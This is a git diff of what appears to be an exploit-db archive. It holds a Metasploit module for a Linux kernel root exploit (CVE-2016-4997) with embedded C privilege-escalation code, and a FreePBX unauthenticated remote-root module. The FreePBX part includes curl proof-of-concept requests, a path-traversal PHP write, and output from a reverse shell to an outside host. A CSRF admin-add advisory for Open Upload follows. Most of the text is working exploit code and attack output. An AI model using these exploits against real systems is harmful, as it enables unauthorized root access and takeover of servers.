+ ret = unshare(CLONE_NEWUSER); + + if (ret == -1) { + perror("unshare"); + return -1; + } + + stack = (void *) malloc(65536); + + if (stack == NULL) { + perror("malloc"); + return -1; + } + + clone(decr, stack + 65536, CLONE_NEWNET, NULL); + + sleep(1); + + return 0; + } + } + + # direct copy of code from exploit-db + pwn = %q{ + #include + #include + #include + #include + #include + #include + #include + #include + + #define MMAP_ADDR 0xff814e3000 + #define MMAP_OFFSET 0xb0 + + typedef int __attribute__((regparm(3))) (*commit_creds_fn)(uint64_t cred); + typedef uint64_t __attribute__((regparm(3))) (*prepare_kernel_cred_fn)(uint64_t cred); + + void __attribute__((regparm(3))) privesc() { + commit_creds_fn commit_creds = (void *)0xffffffff810a21c0; + prepare_kernel_cred_fn prepare_kernel_cred = (void *)0xffffffff810a25b0; + commit_creds(prepare_kernel_cred((uint64_t)NULL)); + } + + int main() { + void *payload = (void*)mmap((void *)MMAP_ADDR, 0x400000, 7, 0x32, 0, 0); + assert(payload == (void *)MMAP_ADDR); + + void *shellcode = (void *)(MMAP_ADDR + MMAP_OFFSET); + + memset(shellcode, 0, 0x300000); + + void *ret = memcpy(shellcode, &privesc, 0x300); + assert(ret == shellcode); + + printf("[+] Escalating privs...\n"); + + int fd = open("/dev/ptmx", O_RDWR); + close(fd); + + assert(!getuid()); + + printf("[+] We've got root!"); + + return execl("/bin/bash", "-sh", NULL); + } + } + + # the original code printed a line. However, this is hard to detect due to threading. + # so instead we can write a file in /tmp to catch. + decr.gsub!(/printf\("\[\+\] Done\! Now run \.\/pwn\\n"\);/, + "int fd2 = open(\"#{env_ready_file}\", O_RDWR|O_CREAT, 0777);close(fd2);" ) + + # patch in to run our payload + pwn.gsub!(/execl\("\/bin\/bash", "-sh", NULL\);/, + "execl(\"#{payload_path}\", NULL);") + + def pwn(payload_path, pwn_file, pwn, compile) + # lets write our payload since everythings set for priv esc + vprint_status("Writing payload to #{payload_path}") + write_file(payload_path, generate_payload_exe) + cmd_exec("chmod 555 #{payload_path}") + register_file_for_cleanup(payload_path) + + # now lets drop part 2, and finish up. + rm_f pwn_file + if compile + print_status "Writing pwn executable to #{pwn_file}.c" + rm_f "#{pwn_file}.c" + write_file("#{pwn_file}.c", pwn) + cmd_exec("gcc #{pwn_file}.c -O2 -o #{pwn_file}") + register_file_for_cleanup("#{pwn_file}.c") + else + print_status "Writing pwn executable to #{pwn_file}" + write_file(pwn_file, pwn) + end + register_file_for_cleanup(pwn_file) + cmd_exec("chmod +x #{pwn_file}; #{pwn_file}") + end + + if not compile # we need to override with our pre-created binary + # pwn file + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-pwn.out') + fd = ::File.open( path, "rb") + pwn = fd.read(fd.stat.size) + fd.close + # desc file + path = ::File.join( Msf::Config.data_directory, 'exploits', 'CVE-2016-4997', '2016-4997-decr.out') + fd = ::File.open( path, "rb") + decr = fd.read(fd.stat.size) + fd.close + + # overwrite the hardcoded variable names in the compiled versions + env_ready_file = '/tmp/okDjTFSS' + payload_path = '/tmp/2016_4997_payload' + end + + # check for shortcut + if datastore['REEXPLOIT'] + pwn(payload_path, pwn_file, pwn, compile) + else + rm_f desc_file + if compile + print_status "Writing desc executable to #{desc_file}.c" + rm_f "#{desc_file}.c" + write_file("#{desc_file}.c", decr) + register_file_for_cleanup("#{desc_file}.c") + output = cmd_exec("gcc #{desc_file}.c -m32 -O2 -o #{desc_file}") + else + write_file(desc_file, decr) + end + rm_f env_ready_file + register_file_for_cleanup(env_ready_file) + #register_file_for_cleanup(desc_file) + if not file_exist?(desc_file) + vprint_error("gcc failure output: #{output}") + fail_with(Failure::Unknown, "#{desc_file}.c failed to compile") + end + if target.name == "Ubuntu" + vprint_status "Executing #{desc_file}, may take around 35s to finish. Watching for #{env_ready_file} to be created." + elsif target.name == "Fedora" + vprint_status "Executing #{desc_file}, may take around 80s to finish. Watching for #{env_ready_file} to be created." + end + cmd_exec("chmod +x #{desc_file}; #{desc_file}") + sec_waited = 0 + + until sec_waited > datastore['MAXWAIT'] do + Rex.sleep(1) + if sec_waited % 10 == 0 + vprint_status("Waited #{sec_waited}s so far") + end + + if file_exist?(env_ready_file) + print_good("desc finished, env ready.") + pwn(payload_path, pwn_file, pwn, compile) + return + end + sec_waited +=1 + end + end + end +end \ No newline at end of file diff --git a/platforms/linux/local/21980.c b/platforms/linux/local/21980.c index 16096aead..9211e56b7 100755 --- a/platforms/linux/local/21980.c +++ b/platforms/linux/local/21980.c @@ -1,3 +1,4 @@ +/* source: http://www.securityfocus.com/bid/6094/info Vulnerabilities have been discovered in two files used by Abuse. @@ -7,6 +8,7 @@ By passing an execessively long commandline argument to Abuse, it is possible to It should be noted that one of the affected files is installed setuid root. It should also be noted that Abuse 2.00, packaged and distributed with the x86 architecture of Debian Linux 3.0 has been reported vulnerable. It is not yet known if other packages are affected by this issue. +*/ /* Abuse.console version 2.0 Exploit */ /* By Girish diff --git a/platforms/linux/local/40203.py b/platforms/linux/local/40203.py index 811a5c80f..1521ca292 100755 --- a/platforms/linux/local/40203.py +++ b/platforms/linux/local/40203.py @@ -4,13 +4,11 @@ # Program affected: zFTP Client # Affected value: NAME under FTP connection # Where in the code: Line 30 in strcpy_chk.c -# __strcpy_chk (dest=0xb7f811c0 "/KUIP", src=0xb76a6680 -"/MACRO", destlen=0x50) at strcpy_chk.c:30 +# __strcpy_chk (dest=0xb7f811c0 "/KUIP", src=0xb76a6680 "/MACRO", destlen=0x50) at strcpy_chk.c:30 # Version: 20061220+dfsg3-4.1 # # Tested and developed under: Kali Linux 2.0 x86 - https://www.kali.org -# Program description: ZFTP is a macro-extensible file transfer -program which supports the +# Program description: ZFTP is a macro-extensible file transfer program which supports the # transfer of formatted, unformatted and ZEBRA RZ files # Kali Linux 2.0 package: pool/main/c/cernlib/zftp_20061220+dfsg3-4.1_i386.deb # MD5sum: 524217187d28e4444d6c437ddd37e4de diff --git a/platforms/multiple/dos/38779.py b/platforms/multiple/dos/38779.py index c88edbd21..1a7598599 100755 --- a/platforms/multiple/dos/38779.py +++ b/platforms/multiple/dos/38779.py @@ -1,3 +1,4 @@ +''' source: http://www.securityfocus.com/bid/62723/info Abuse HTTP Server is prone to a remote denial-of-service vulnerability. @@ -5,6 +6,7 @@ Abuse HTTP Server is prone to a remote denial-of-service vulnerability. Attackers can exploit this issue to cause denial-of-service conditions. Abuse HTTP Server version 2.08 is vulnerable; other versions may also be affected. +''' #!/usr/bin/python diff --git a/platforms/php/remote/40434.rb b/platforms/php/remote/40434.rb new file mode 100755 index 000000000..d1090884c --- /dev/null +++ b/platforms/php/remote/40434.rb @@ -0,0 +1,240 @@ +#Title : Freepbx < 13.0.188 , Remote root exploit +#Vulnerable software : Freepbx < 13.0.188 +#Author : Ahmed Sultan (0x4148) +#Email : 0x4148@gmail.com +#Current software status : patch released +#Vendor : Sangoma + +=begin +Freepbx 13.x are vulnerable to Remote command execution due to the insuffecient sanitization of the user input fields language,destination and also due to the lack of good authentication checking +Technical details +Vulnerable file : admin/modules/hotelwakeup/Hotelwakeup.class.php +Line 102 : + public function generateCallFile($foo) { + ............................... + if (empty($foo['filename'])) { + $foo['filename'] = "wuc.".$foo['time'].".ext.".$foo['ext'].".call"; <<<<<---------------------Vulnerable + } + ........................... + // Delete any old .call file with the same name as the one we are creating. + if(file_exists($outfile) ) { + unlink($outfile); + } + // Create up a .call file, write and close + $wuc = fopen($tempfile, 'w'); + fputs( $wuc, "channel: Local/".$foo['ext']."@originate-skipvm\n" ); + fputs( $wuc, "maxretries: ".$foo['maxretries']."\n"); + fputs( $wuc, "retrytime: ".$foo['retrytime']."\n"); + fputs( $wuc, "waittime: ".$foo['waittime']."\n"); + fputs( $wuc, "callerid: ".$foo['callerid']."\n"); + fputs( $wuc, 'set: CHANNEL(language)='.$foo['language']."\n"); <<<<<---------------------Vulnerable + fputs( $wuc, "application: ".$foo['application']."\n"); + fputs( $wuc, "data: ".$foo['data']."\n"); + fclose( $wuc ); + .......................... +The ext value can be manipulated by the attacker to change the output file path +the language value can be manipulated by the attacket to load in malicious contents +Function is called at +Line 94 : + public function addWakeup($destination, $time, $lang) { + $date = $this->getConfig(); // module config provided by user + $this->generateCallFile(array( + "time" => $time, + "date" => 'unused', + "ext" => $destination, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [Filename field] + "language" => $lang, <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<================ Vulnerable [language field loaded with malicious code] + "maxretries" => $date['maxretries'], + "retrytime" => $date['retrytime'], + "waittime" => $date['waittime'], + "callerid" => $date['cnam']." <".$date['cid'].">", + "application" => 'AGI', + "data" => 'wakeconfirm.php', + )); + } +addWakeup function is called when calling the hotelwakeup module via ajax.php and setting savecall as command +Line 60 : + switch($_REQUEST['command']) { + case "savecall": + if(empty($_POST['language'])) { + $lang = 'en'; //default to English if empty + } else { + $lang = $_POST['language']; <<<<<<<<<<<<<<<<<<<=========================== + } + ............................................ + if ($badtime) { + // abandon .call file creation and pop up a js alert to the user + return array("status" => false, "message" => sprintf(_("Cannot schedule the call the scheduled time is in the past. [Time now: %s] [Wakeup Time: %s]"),date(DATE_RFC2822,$time_now),date(DATE_RFC2822,$time_wakeup))); + } else { + $this->addWakeup($_POST['destination'],$time_wakeup,$lang); <<<<<<<<<<<======================= + return array("status" => true); + } + ................................. +POC : +[0x4148:/lab]# curl "http://68.170.92.50:8080/admin/ajax.php" -H "Host: 68.170.92.50:8080" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" -H "Accept-Language: en-US,en;q=0.5" --compressed -H "Referer: http://68.170.92.50:8080/admin/ajax.php" -H "Cookie: lang=en_US; PHPSESSID=9sfgl5leajk74buajm0re2i014" -H "Connection: keep-alive" -H "Upgrade-Insecure-Requests: 1" --data "module=hotelwakeup&command=savecall&day=now&time="%"2B1 week&destination=/../../../../../../var/www/html/0x4148.php&language=" +{"error":{"type":"Whoops\\Exception\\ErrorException","message":"touch(): Unable to create file \/var\/spool\/asterisk\/tmp\/wuc.1475613328.ext.\/..\/..\/..\/..\/..\/..\/var\/www\/html\/0x4148.php.call because No such file or directory","file":"\/var\/www\/html\/admin\/modules\/hotelwakeup\/Hotelwakeup.class.php","line":238}}# + +The error mean nothing , we still can get our malicious file via http://server:port/0x4148.php.call +the server will ignore.call extn and will execute the php + +[0x4148:/lab]# curl "http://68.170.92.50:8080/0x4148.php.call" +channel: Local//../../../../../../var/www/html/0x4148.php@originate-skipvm +maxretries: 3 +retrytime: 60 +waittime: 60 +callerid: Wake Up Calls <*68> +set: CHANNEL(language)=Linux HOUPBX 2.6.32-504.8.1.el6.x86_64 #1 SMP Wed Jan 28 21:11:36 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux +uid=499(asterisk) gid=498(asterisk) groups=498(asterisk) +application: AGI +data: wakeconfirm.php + +Privelage can be escalated via adding the asterisk user to sudoers which can be done manually +then echo a > /var/spool/asterisk/sysadmin/amportal_restart +sleeping for few seconds +then sudo bash -i + +MSF OUTPUT +msf > use exploit/fpbx +msf exploit(fpbx) > set RHOST 68.170.92.50 +RHOST => 68.170.92.50 +msf exploit(fpbx) > set RPORT 8080 +RPORT => 8080 +msf exploit(fpbx) > exploit + +[*] [2016.09.27-16:39:21] Started reverse TCP handler on 88.150.231.125:443 +[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Sending payload . . . +[*] [2016.09.27-16:39:21] 68.170.92.50:8080 - Trying to execute payload +[+] [2016.09.27-16:39:41] 68.170.92.50:8080 - Payload executed +[*] [2016.09.27-16:39:41] 68.170.92.50:8080 - Spawning root shell + +id +uid=0(root) gid=0(root) groups=0(root) +sh -i +sh: no job control in this shell +sh-4.1# pwd +pwd +/var/www/html +sh-4.1# whoami +whoami +root +sh-4.1# +=end +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'FreePBX < 13.0.188.1 Remote root exploit', + 'Description' => ' + This module exploits an unauthenticated remote command execution in FreePBX module Hotelwakeup + ', + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Ahmed sultan (0x4148) <0x4148@gmail.com>', # discovery of vulnerability and msf module + ], + 'References' => + [ + "NA" + ], + 'Payload' => + { + 'Compat' => + { + 'PayloadType' => 'cmd', + 'RequiredCmd' => 'perl telnet python' + } + }, + 'Platform' => %w(linux unix), + 'Arch' => ARCH_CMD, + 'Targets' => [['Automatic', {}]], + 'Privileged' => 'false', + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Sep 27 2016')) + end + + def print_status(msg = '') + super("#{rhost}:#{rport} - #{msg}") + end + + def print_error(msg = '') + super("#{rhost}:#{rport} - #{msg}") + end + + def print_good(msg = '') + super("#{rhost}:#{rport} - #{msg}") + end + + # Application Check + def check + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'), + 'headers' => { + 'Referer' => "http://#{datastore['RHOST']}/jnk0x4148stuff" + }, + 'vars_post' => { + 'module' => 'hotelwakeup', + 'command' => 'savecall' + } + ) + + unless res + vprint_error('Connection timed out.') + end + if res.body.include? "Referrer" + vprint_good("Hotelwakeup module detected") + return Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + def exploit + vprint_status('Sending payload . . .') + pwn = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri(target_uri.path, 'admin', 'ajax.php'), + 'headers' => { + 'Referer' => "http://#{datastore['RHOST']}:#{datastore['RPORT']}/admin/ajax.php?module=hotelwakeup&action=savecall", + 'Accept' => "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + 'User-agent' => "mostahter ;)" + }, + 'vars_post' => { + 'module' => 'hotelwakeup', + 'command' => 'savecall', + 'day' => 'now', + 'time' => '+1 week', + 'destination' => '/../../../../../../var/www/html/0x4148.php', + 'language' => '', + } + ) + #vprint_status("#{pwn}") + vprint_status('Trying to execute payload ') + escalate = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '0x4148.php.call'), + 'vars_get' => { + '0x4148' => "r1z" + } + ) + if escalate.body.include? "0x4148@r1z" + vprint_good("Payload executed") + vprint_status("Spawning root shell") + killit = send_request_cgi( + 'method' => 'GET', + 'uri' => normalize_uri(target_uri.path, '0x4148.php.call'), + 'vars_get' => { + 'r1zcmd' => "#{payload.encoded}" + } + ) + else + vprint_error("Exploitation Failed") + end + end +end \ No newline at end of file diff --git a/platforms/php/webapps/40168.txt b/platforms/php/webapps/40168.txt new file mode 100755 index 000000000..c93975b3f --- /dev/null +++ b/platforms/php/webapps/40168.txt @@ -0,0 +1,65 @@ +================================================================================================================ +Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission +================================================================================================================ +# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit +# Exploit Author : Vinesh Redkar (@b0rn2pwn) +# Email : vineshredkar89[at]gmail[d0t]com +# Date: 21/07/2016 +# Vendor Homepage: http://openupload.sourceforge.net/ +# Software Link: https://sourceforge.net/projects/openupload/ +# Version: 0.4.2 +# Tested on: Windows 10 OS + +Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning +that if an admin user can be tricked to visit a crafted URL created by +attacker (via spear phishing/social engineering). + +Once exploited, the attacker can login as the admin using the username and the password he posted in the form. + +======================CSRF POC (Adding New user with Admin Privileges)================================== +CSRF PoC Code + + +Remote Admin Add CSRF Exploit + +

Remote Admin Add CSRF Exploit by b0rn2pwn

+ +
+ + + + + + + + + + + +
+ + + +======================CSRF POC (Changing privileges from normal user to administer)================================== + + + +Change privilege normal user to administer CSRF Exploit + +

Change privilege normal user to administer CSRF Exploit by b0rn2pwn

+ +
+ + + + + + + + + + + +
+ +